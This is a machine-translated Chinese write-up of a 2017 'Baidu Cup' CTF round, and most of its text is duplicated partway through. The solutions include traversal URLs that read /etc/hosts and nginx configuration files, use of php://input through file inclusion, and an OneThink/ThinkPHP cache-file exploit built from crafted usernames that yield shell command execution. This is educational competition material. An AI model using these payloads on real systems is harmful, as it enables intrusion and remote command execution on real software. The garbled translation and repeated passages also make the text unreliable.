2017“百度杯”二月第二周Write Up
1,爆破一 限制了只允许数字字母下划线 利用超全局变量 $GLOBALS 获得FLAG 2,爆破二 很明显的代码注入 获得FLAG 3,爆破三 SESSION nums需要>=10…
1,爆破一
限制为仅允许使用字母数字下划线
利用超全局变量$ GLOBALS
获取标志
2,爆破二
代码注入明显
获取标志
3,爆破三
SESSION nums需要>=10返回标志
初始化为0
其中substr(md5($ value),5,4)==0是常量
只要whoami相等,对于nums,它将是 加1。
Whoami初始化为ea
加上一个将输出下一个随机的whoami值。我不知道问题是不是错了。我只需要提交10次。
第一次提交值[0]=e& value [1]=a
下一个值基于相应的构造请求输出。
显然包含漏洞
检查phpinfo信息并找到allow_url_include已启用。您可以使用php: //输入和其他协议来执行任意代码。
获取标志
5,Zone
设置login=0
伪造的登录=1重新访问
获取管理页面
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=index&name=php
似乎是一个漏洞
测试模糊
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=in./dex&name=php
恢复正常
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=in./dex&name=php
返回空白
替换./
双重建筑
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=./././././././././。/etc/hosts& name=
包括日志blast上传路径失败
查看nginx.conf文件
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=././././././././././etc/nginx/nginx的.conf&安培;名称=
继续查看此文件
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=././././././././././etc/nginx/sites - 启用/默认&安培;名称=
这里更可疑 搜索引擎搜索了解这个地方设置错误将导致目录遍历下载漏洞
具体使用百度
获取标志
6,Onethink
该主题提示使用已知漏洞取壳,百度搜索“onethink漏洞”,找到以下文章
http://www.ourlove520.com/Article/diannao/wangluo/227731.html //onethink最新杀戮getshell定位分析
http://www.hackdig.com/06/hack-36510.html //由thinkphp框架编写的开源系统或者getshell tp的官方onethink
一般的想法是thinkphp的提示缓存与onethink过滤引起的命令执行漏洞相结合。
Thinkphp的默认缓存模式S()是一种File方法,它在/Runtime/Temp下生成一个文件名为的固定缓存文件。
Onethink在/Runtime/Temp中生成一个缓存文件2bb202459c30a1628513f40ab22fa01a.php,其中记录的用户名可以由用户控制。由于用户名在注册期间的长度有限,因此不会过滤内容,从而导致命令执行漏洞。
虽然地图挂了,但看看代码和文本分析,源代码回到本地环境测试很长一段时间,勉强重现漏洞利用。
由于用户名的长度有限,请使用burpsuit更改包并注册以下2个帐户:
%0A $ a=$ _ GET并[a]; //
%0aecho` $ a`; //
然后按顺序登录,这里要注意顺序,因为第一次登录会写入缓存文件,命令无法执行。
上次访问
/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ././flag.php
获得旗帜
通知
由于百度杯2月的第三场比赛时间(2017/2/25 - 2017/2/26)与XCTF比赛郑州站ZCTF之间的冲突,为了确保比赛的稳定运行,决定
将百度杯的入场时间在2月的第三周更改为两天,更改为 2017/2/23 - 2017/2/24 (本周四,周五),然后公告将在相关的比赛组中发送,敬请期待!也欢迎大家关注百度杯和ZCTF~祝大家参与愉快! ^ _ ^
[本文来自i春秋季,安全脉冲完成发布]
限制为仅允许使用字母数字下划线
利用超全局变量$ GLOBALS
获取标志
2,爆破二
代码注入明显
获取标志
3,爆破三
SESSION nums需要>=10返回标志
初始化为0
其中substr(md5($ value),5,4)==0是常量
只要whoami相等,对于nums,它将是 加1。
Whoami初始化为ea
加上一个将输出下一个随机的whoami值。我不知道问题是不是错了。我只需要提交10次。
第一次提交值[0]=e& value [1]=a
下一个值基于相应的构造请求输出。
显然包含漏洞
检查phpinfo信息并找到allow_url_include已启用。您可以使用php: //输入和其他协议来执行任意代码。
获取标志
5,Zone
设置login=0
伪造的登录=1重新访问
获取管理页面
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=index&name=php
似乎是一个漏洞
测试模糊
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=in./dex&name=php
恢复正常
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=in./dex&name=php
返回空白
替换./
双重建筑
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=./././././././././。/etc/hosts& name=
包括日志blast上传路径失败
查看nginx.conf文件
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=././././././././././etc/nginx/nginx的.conf&安培;名称=
继续查看此文件
http://fff70c630e154d28b1f69c128565dc86cde01d11dc9342af.ctf.game/manages/admin.php?module=././././././././././etc/nginx/sites - 启用/默认&安培;名称=
这里更可疑 搜索引擎搜索了解这个地方设置错误将导致目录遍历下载漏洞
具体使用百度
获取标志
6,Onethink
该主题提示使用已知漏洞取壳,百度搜索“onethink漏洞”,找到以下文章
http://www.ourlove520.com/Article/diannao/wangluo/227731.html //onethink最新杀戮getshell定位分析
http://www.hackdig.com/06/hack-36510.html //由thinkphp框架编写的开源系统或者getshell tp的官方onethink
一般的想法是thinkphp的提示缓存与onethink过滤引起的命令执行漏洞相结合。
Thinkphp的默认缓存模式S()是一种File方法,它在/Runtime/Temp下生成一个文件名为的固定缓存文件。
Onethink在/Runtime/Temp中生成一个缓存文件2bb202459c30a1628513f40ab22fa01a.php,其中记录的用户名可以由用户控制。由于用户名在注册期间的长度有限,因此不会过滤内容,从而导致命令执行漏洞。
虽然地图挂了,但看看代码和文本分析,源代码回到本地环境测试很长一段时间,勉强重现漏洞利用。
由于用户名的长度有限,请使用burpsuit更改包并注册以下2个帐户:
%0A $ a=$ _ GET并[a]; //
%0aecho` $ a`; //
然后按顺序登录,这里要注意顺序,因为第一次登录会写入缓存文件,命令无法执行。
上次访问
/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ././flag.php
获得旗帜
通知
由于百度杯2月的第三场比赛时间(2017/2/25 - 2017/2/26)与XCTF比赛郑州站ZCTF之间的冲突,为了确保比赛的稳定运行,决定
将百度杯的入场时间在2月的第三周更改为两天,更改为 2017/2/23 - 2017/2/24 (本周四,周五),然后公告将在相关的比赛组中发送,敬请期待!也欢迎大家关注百度杯和ZCTF~祝大家参与愉快! ^ _ ^
[本文来自i春秋季,安全脉冲完成发布]
- 发表于 2017-02-21 08:00
- 阅读 ( 429 )
- 分类:黑客技术
